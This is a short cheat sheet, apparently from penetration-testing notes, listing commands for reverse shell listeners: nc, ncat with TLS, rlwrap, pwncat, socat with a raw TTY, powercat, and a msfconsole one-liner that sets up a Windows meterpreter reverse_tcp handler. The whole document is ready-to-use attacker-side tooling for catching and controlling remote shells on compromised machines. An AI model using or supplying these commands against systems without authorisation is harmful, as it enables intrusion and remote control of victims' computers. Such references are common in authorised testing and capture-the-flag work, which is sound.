#
Reverse shell listeners
#
nc
nc -lvnp 9002
#
ncat
ncat -lvnp 9002
Using TLS:
ncat --ssl -lvnp 9002
#
rlwrap
rlwrap wraps any command line-oriented tool using readline to provide you a history allow you to edit each line before you send it.
rlwrap -cAr nc -lvnp 9002
#
pwncat
python3 -m pwncat -lp 9002
#
ConPty (Windows)
stty raw -echo; (stty size; cat) | nc -lvnp 9002
#
socat
socat -d -d TCP-LISTEN:9002 STDOUT
#
socat (TTY)
socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:9002
#
powercat
powercat -l -p 9002
#
msfconsole
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.10.10; set lport 9002; exploit"